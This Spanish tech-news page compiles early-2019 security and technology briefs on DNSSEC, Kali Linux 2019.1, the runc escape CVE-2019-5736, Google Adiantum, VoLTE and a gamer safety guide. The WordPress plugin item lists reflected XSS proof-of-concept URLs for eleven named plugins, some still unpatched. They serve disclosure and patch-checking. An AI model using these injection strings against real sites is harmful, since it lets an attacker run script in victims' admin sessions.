La ICANN habla sobre el riesgo de no usar DNSSEC

La Corporación de Internet para la Asignación de Nombres y Números (ICANN) que son los encargados de gestionar la administración de los elementos técnicos del Sistema de Nombres de Dominio (DNS) para garantizar la resolución unívoca de los dominios de las webs. Actualemete, la ICANN advierte que existe "un riesgo continuo y significativo para las partes clave de la infraestructura DNS".

¿Cómo funcionan los DNS?

De forma muy genérica los DNS se utiliza principalmente para la resolución de nombres de dominios, es decir, cuando un escribe en su navegador un nombre de una web este lo convierte en una dirección numérica (IP) para que los usuarios puedan conectarse a los sitios web que desean visitar.

La infraestructura de los DNS está siendo atacada

Según un comunidaco publicado el viernes por la ICANN, la infraestructura del DNS está siendo atacada por "actividad maliciosa". En respuesta a los ataques a DNS, ICANN está pidiendo la implementación completa de las "Extensiones de seguridad del DNS" (DNSSEC).

DNSSEC es una tecnología que "firma" digitalmente los datos para asegurar su validez y evita que las personas sean redirigidas de forma maliciosa de los sitios web que tenían la intención de visitar. Es una herramienta eficaz para ayudar a prevenir los ataques de "Man in the Middle" donde los estafadores pueden enviar personas a sitios falsos y engañarles para que revelen sus credenciales, detalles de pago u otra información personal.

Este último anuncio de la ICANN se produce menos de dos semanas después de que anunciaron una lista de verificación para los registradores y vendedores de dominios para ayudar a fortalecer su seguridad después de los ataques. Y si bien la ICANN admite que sus soluciones propuestas, incluida la implementación completa de DNSSEC, no resolverán todos los problemas de seguridad de Internet, todas las medidas adoptadas para minimizar el riesgo deberían implementarse lo más ampliamente posible.

Muchas compañias del Fortune 1000 no usan DNSSEC

Actualmente podemos decir que no existe una buena aceptación de la implementación del DNSSEC entre las compañías de Fortune 1000 supuestamente es tan baja que solo es del tres por ciento. Nosotros desde Tecnonucleous llevamos usando DNSSEC desde hace 4~5 meses y es un servicio que algunos registradores de dominio están ofreciendo de forma completamente gratuita.

En algunos proveedores de dominios estas soluciones de seguridad se activan de forma automática con solo usar los DNS del mismo proveedor de dominios, en otros casos es necesario activarlo desde el panel de control del dominio.

Fuente: ICANN | Tecnonucleous

Kali Linux 2019.1

Offensive Security acaba de lanzar Kali Linux 2019.1 que es la primera versión lanzada este 2019 de esta distribución que es una navaja suiza para profesionales de la ciberseguridad. Cuenta con la versión 4.19.13 del Kernel que contiene numerosos parches además actualizar muchos programas como Metasploit, theHarvester, DBeaver y más.

Kali Linux 2019.1 viene con la última versión de Metasploit (v5.0), que "incluye bases de datos y API de automatización, nuevas capacidades de evasión y mejoras de uso", lo que la convierte en una plataforma más eficiente para realizar pruebas de penetración.

Kali Linux 2019.1 incluye el soporte para Banana Pi y Banana Pro

Gracias a la versión de Kali 2019.1 para ARM ahora podemos usar la Banana Pi y Banana Pro, ambos de los cuales están incluidos en el kernel 4.19.

Veyron se ha movido al kernel 4.19 y las imágenes de Raspberry Pi se han simplificado para que sea más fácil averiguar cuál usar.

Ya no hay imágenes Raspberry Pi separadas para usuarios con TFT LCD porque ahora incluyen el script kalipi-tft-config de re4son en todos ellos, por lo que si deseas configurar una placa con un TFT, ejecuta 'kalipi-tft-config' y siga las indicaciones.

Disponibles las nuevas VM de Kali

Las máquina virtuales de esta distribución y las imágenes ARM también se han actualizado a la última versión 2019.1 y ya puedes descargarlas desde este enlace

¿Cómo descargar o actualizar Kali Linux?

Puedes descargar las nuevas imágenes ISO de Kali Linux directamente desde el sitio web oficial y si ya estas actualmente usando Kali Linux puedes simplemente actualizarlo a la última ejecutando el comando: apt update && apt -y

Fuente | tecnonucleous

Vulnerabilidad en runc permite escapar de contenedor #Docker con permisos root

El fallo afecta a otros productos derivados de Docker que usan runc y al propio LXC, permitiendo acceder a la máquina host con permisos de superusuario.

Los investigadores Adam Iwaniuk y Borys Popławski han descubierto una vulnerabilidad en runc, la utilidad para ejecutar contenedores de la Open Containers Initiative, por la cual es posible obtener root en la máquina que ejecuta el contenedor. Además, Aleksa Sarai, uno de los mantenedores de runc, ha conseguido crear una versión modificada del fallo que también afectaría a LXC.

Para la explotación del fallo sólo es necesario un contenedor malicioso, el cual sobrescribirá el binario ‘runc’de la máquina host, y que el usuario acceda dicho contenedor (utilizando ‘docker exec’). El ataque no es bloqueado por la política por defecto de AppArmor, al igual que la de SELinux en sistemas como Fedora. No obstante, utilizando el modo enforcing mode con una correcta configuración de los namespaces (como ocurre por defecto en Red Hat), el ataque sí es bloqueado.

La vulnerabilidad ha sido identificada con el CVE-2019-5736, y ya hay un parche disponible que corrige el fallo. Si no fuese posible parchear, una posible solución es configurar SELinux correctamente para impedir la explotación. El 18 de febrero (7 días después de la revelarse el fallo) se publicará una prueba de concepto para poder comprobar si se es vulnerable.

Empresas de Cloud como Amazon AWS ya se han comunicado con sus clientes para informarles del fallo, y se espera que en los próximos días otras empresas del sector hagan lo mismo. En principio, los clientes de estos servicios no necesitan tomar medidas, pero aquellos administradores de sistemas que mantengan servidores con Docker deberán parchear para evitar ser víctimas del CVE-2019-5736.

Fuente | una-al-dia

#XSS en múltiples plugins para #WordPress

El investigador de seguridad Tim Coen ha publicado múltiples vulnerabilidades en hasta 11 Plugins diferentes para WordPress. Estas vulnerabilidades podrían permitir realizar ataques ‘Cross-site Scripting’ (XSS) reflejados debido a la falta de filtrado antes de mostrar determinados parámetros con contenido proporcionado por el usuario.

A continuación se enumeran dichos plugins, las versiones vulnerables y actualizadas, el parámetro causante del fallo de seguridad y una prueba de concepto para comprobar si la versión instalada se encuentra afectada:

Blog2Social

• Versión vulnerable: 5.0.2
• Versión actualizada: 5.0.3
• Parámetro ‘b2s_update_publish_date’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=blog2social-ship&postId=70&b2s_action=1&b2s_update_publish_date='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

Contact Form Email 7.10.41

• Versión vulnerable: 1.2.65
• Versión actualizada: 1.2.66
• Parámetro ‘item’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

Font_Organizer

• Versión vulnerable: 2.1.1
• Versión actualizada: Este plugin no ha recibido ninguna actualización por el momento.
• Parámetro ‘manage_font_id’
• PoC: http://[WP-BLOG]/wp-admin/options-general.php?page=font-setting-admin&manage_font_id='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

Give

• Versión vulnerable: 2.3.0
• Versión actualizada: 2.3.1
• Varios parámetros como ‘csv’, ‘mode’, ‘create_user’ y ‘delete_csv’.
• PoC: http://[WP-BLOG]/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations&step=3&mapto%5B0%5D=email&mapto%5B1%5D=first_name&mapto%5B2%5D=amount&mapto%5B3%5D=form_id&csv='”><img+src%3dx+onerror%3dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

KingComposer

• Versión vulnerable: 2.7.6
• Versión actualizada: Los desarrolladores de este plugin no han dado ninguna respuesta sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 2.7.8).
• Parámetro ‘id’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)<%2Fscript>

NextScripts: Social Networks Auto-Poster

• Versión vulnerable: 4.2.7
• Versión actualizada: 4.2.8
• Parámetro ‘item’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=nxssnap-reposter&action=edit&item=24′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

Quiz And Survey Master

• Versión vulnerable: 6.0.4
• Versión actualizada: Los desarrolladores de este plugin no han dado ninguna información sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 6.2.0).
• Parámetro ‘quiz_id’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=mlw_quiz_results&quiz_id='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

wpGoogleMaps

• Versión vulnerable: 7.10.41
• Versión actualizada: 7.10.43
• Al hacer un eco de ‘PHP_SELF’ sin filtrado previo.
• PoC: http://[WP-BLOG]/wp-admin/admin.php/'”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>?page=wp-google-maps-menu&action=foo

WP Live Chat Support

• Versión vulnerable: 8.0.17
• Versión actualizada: 8.0.18
• Parámetro: ‘term’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>

YOP Poll

• Versión vulnerable: 6.0.2
• Versión actualizada: 6.0.3
• Parámetro: ‘poll_id’
• PoC: http://[WP-BLOG]/wp-admin/admin.php?page=yop-polls&action=view-votes&poll_id=1′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
• Adicionalmente también ha publicado varios errores de seguridad en el plugin Forminator para WordPress, de los cuales ya hablamos hace unos días: “Vulnerabilidades en el plugin de WordPress Forminator“.

Se pueden descargar las versiones indicadas de los anteriores plugins desde la página web oficial de WorPress.

Fuente | una-al-dia

Google Adiantum es un nuevo cifrado para los teléfonos de gama baja

Google ha presentado ya de manera oficial Adiantum. Se trata de un nuevo cifrado que se lanza de manera específica para los smartphones de gama baja. Con este cifrado se busca ofrecer una protección para todos los usuarios. Se lanza como una alternativa a AES, un cifrado que nos encontramos en la gama media y alta en el mercado. Pero en la gama baja el procesador no siempre es compatible.

Por eso, en muchos casos la experiencia de uso no es positiva, porque el funcionamiento es lento. Con este nuevo método, basado en el cifrado de flujo ChaCha20, se busca cambiar esto.

Nuevo cifrado de Google

La clave es que Adiantum funcions con una rapidez mayor que otros sistemas como AES, pero manteniendo en todo momento su seguridad. Con este nuevo sistema de cifrado, Google ha pensado en la gama baja en Android. Ya que estos modelos se venden en muchos países, especialmente en países en vía de desarrollo. Por eso, se busca que también dichos modelos sean seguros en todo momento.

Se trata de una buena opción para usuarios que tengan un smartphone con Android Go como sistema operativo. Especialmente porque suelen ser modelos poco potentes, con poca RAM. De modo que este cifrado se adaptaría mejor.

Los fabricantes con Android Pie podrán activar este nuevo cifrado de Google en sus teléfonos. Por tanto, es probable que los siguientes smartphones que lleguen a las tiendas con esta versión del sistema operativo en la gama baja hagan ya uso del mismo.

Enlace | ProfesionalReview

Vulnerabilidades en el plugin de #WordPress Forminator

Se han hecho públicas 5 vulnerabilidades que afectan a Forminator en su versión 1.5 y han sido calificadas de alto riesgo.

Forminator es un plugin para WordPress, con el que se pueden realizar de forma cómoda formularios de contacto, encuestas, pruebas, etc.

La primera de las vulnerabilidades permitiría a un atacante no autenticado realizar un ataque XSS persistente través de un formulario de encuesta. Este error es debido a una incorrecta codificación en uno de los campos a la hora de mostrar los resultados de dicha encuesta.

La segunda vulnerabilidad permite la extracción de información sensible de la base de datos a través de una inyección SQL relaccionada con la acción de eliminar envíos. Para aprovechar este fallo de seguridad sí es requerido que el atacante esté autenticado en el sistema y tenga permisos para realizar esta acción.

La siguiente vulnerabilidad existe gracias a la carga de archivos, la cual podría ser aprovechada para realizar un ataque XSS, debido a que el fichero que se sube a través del formulario es añadido directamente al DOM.

Otra vulnerabilidad existe debido a una falta de protección al abrir una pestaña nueva en el navegador, la cual podría permitir a un atacante remoto el robo de información sensible a través de la recarga de una página falsa en la pestaña origen. A este tipo de ataque se le conoce como ‘Tab Napping’.

La última vulnerabilidad reportada aparece en la acción de exportación de resultados, que podría ser aprovechada para revelar información sensible a través del envío de datos especialmente manipulados en un formulario.

Las vulnerabilidades, que actualmente tienen pruebas de concepto para su explotación, fueron reportadas el día 25 de noviembre de 2018, y disponen de una solución oficial desde el día 10 de diciembre.

Enlace | una-al-dia

Más información
Forminator 1.5.4 – Unauthenticated Persistent XSS, Blind SQL Injection, Misc
https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/

¿Qué es el VoLTE?

Hoy en día, la mayoría de smartphones disponen de la tecnología adecuada para poder disfrutar de la red 4G, una evolución de las redes 3G que permiten navegar más rápido. Si al 4G, le añadimos la tecnología VoLTE, la calidad de nuestras llamadas mejorará substancialmente. A continuación te explicamos todo lo que necesitas saber sobre VoLTE y cómo y cuándo puedes disfrutar de su uso.

¿Qué es y cómo funciona VoLTE?

VoLTE es, simplemente, llamadas de voz a través de la red LTE, o usualmente llamada 4G. Hasta ahora las operadoras utilizaban las redes GSM o UMTS para transmitir las comunicaciones de voz entre terminales y la red 3G y 4G se encargaban de transmitir nuestros datos a través de internet. El desarrollo de esta tecnología ha hecho que cada vez se puedan transmitir más datos a mayor velocidad.

Con VoLTE las operadoras disponen de un servicio capaz de transmitir nuestra voz en pequeños paquetes comprimidos a través de internet al igual que hacen con nuestros emails cada vez que usamos Gmail o las conversaciones de WhatsApp.

¿Mi smartphone puede usar VoLTE?

Para poder utilizar VoLTE debemos disponer de un smartphone con conexión a redes LTE, es decir vuestro Android debe tener 4G. Por supuesto, nuestro operador debe ofrecer este servicio (las principales operadores lo hacen). Anteriormente necesitábamos un pequeño software para poder hacer llamadas VoLTE, pero hoy en día ya está integrado de forma automática.

La lista de los smartphones compatibles con esta tecnología incluye:

• Huaeri P9 y superiores
• iPhone 6 y superiores
• OnePlus One y superiores
• Samsung S8 y superiores
• Samsung J3, J5 y J7
• Sony Xperia X, XZ, XZ Premium y superiores

En España, Vodafone fue la primera compañía en ofrecer este servicio. Orange también da acceso a VoLTE, y Movistar fue el último en sumarse.

Ventajas de VoLTE

Las ventajas de usar la red 4G para el envío de datos son evidentes: más velocidad y más datos. Ventajas de las que se va a aprovechar también VoLTE.

Voz en alta definición. La calidad de la llamada va a dar un salto con las llamadas VoLTE. El método de compresión en las llamadas tradicionales usa un códec de 8 kbps, pero con VoLTE el códec puede llegar a tener de 13 kbps además de un método de compresión más moderno. El rango de frecuencias también se va a ver aumentado de 300-3400 Hz a 50-7000 Hz. Esto se traduce en una llamada mucho más clara que una llamada móvil tradicional.

Conversaciones enriquecidas. Junto a la llamada, las operadoras podrán ofrecer un conjunto de servicios conocidos como RCS (Rich Communications Services). Estos servicios pueden incluir funciones como videollamadas, transferencia de datos, adjuntar localización o imágenes a la conexión de la llamada, e incluso traducción simultánea durante la misma.

Conexiones más rápidas. El tiempo de establecimiento de llamada con VoLTE se va a ver reducido. Puede que este tiempo de unos siete segundos que ahora mismo esperamos para conectar se vea reducido a tan sólo dos segundos.

Menos consumo de batería. Los servicios de VoLTE tienen un consumo de energía más moderado en comparación con los servicios de VoIP como Skype. VoLTE no es tan exigente con sus requisitos de red, y por ello consume mucho menos energía que una llamada de voz por Skype.
Integración con Wi-Fi. No sólo se puede usar VoLTE a través de la red 4G, si no que también podemos usarlo a través de cualquier conexión Wi-Fi, con el consiguiente ahorro en nuestra tarifa de datos.

Inconvenientes de VoLTE

En cuanto a los problemas que pueda traer es de destacar que se trata de una tecnología nueva y como tal todavía necesita un desarrollo más optimo para un servicio de calidad. De momento estos son los inconvenientes de VoLTE:

Desconexión de la llamada. Como ya hemos mencionado, es una tecnología nueva y la red 4G todavía no tiene una extensión suficiente para garantizar una llamada sin desconexiones ya que utiliza antenas diferentes al resto de tecnologías.

Limitado a ciertos dispositivos. Como también hemos mencionado anteriormente, los únicos terminales que soportarían las llamadas VoLTE serán los que cuenten con tecnología 4G.

Sin comunicación entre operadoras. En principio sólo se puede llamar a través de VoLTE entre clientes de la misma operadora, es decir llamadas por ejemplo entre un cliente de Vodafone y otro de Movistar no se podrán realizar a través de VoLTE.

Cambio de precios. Ahora que ya nos hemos acostumbrado a la tarifa plana en llamadas, nos cambian la tecnología. Las llamadas VoLTE, como hemos mencionado utilizan de la red de datos. Por lo tanto el cobro de estas llamadas las encontraremos en la parte sobre uso de datos de nuestra factura.
Desde luego que se trata de un avance con respecto a la forma de comunicarnos que revolucionará las tradicionales llamadas de teléfono como el mismo teléfono revolucionó las comunicaciones.

Fuente | Androidpit

Guía de seguridad para usuarios de videojuegos

La Policía Nacional y el club de deportes electrónicos MAD Lions E.C. – uno de los clubes de e-sports más relevantes de España – han presentado este fin de semana la primera guía de seguridad para jugadores, con la que pretenden reforzar la seguridad de los aficionados a los videojuegos y así evitar que se conviertan en víctimas de ciberacosos o estafas, entre otros delitos.

El documento ha sido presentado en el palacio de congresos y deportes de Aguadulce, en Roquetas de Mar, durante la celebración del Roquetas Gaming Show, en el que a lo largo del fin de semana se han dado cita alrededor de 20.000 jugadores y aficionados.

Solo en el año 2017 y según las cifras de la Asociación Española de Videojuegos, en nuestro país se vendieron un total de 9.650.000 videojuegos (de los que muchos de ellos requieren conexión a Internet), 1.500.000 videoconsolas y 4.400.000 accesorios, lo que supuso el movimiento de unos 1.359 millones de euros en todo el territorio nacional.

La Policía Nacional, líder mundial en redes sociales al acumular en sus perfiles un total de más de 4.200.000 seguidores, y MAD Lions E.C., con una gran reputación en su sector como uno de los principales clubes españoles, también han presentado, además de la guía, un vídeo con el que los agentes y el club pretenden llegar a los 16 millones de videojugadores españoles, además de a padres y educadores.

La Vanguardia (04/02/2019)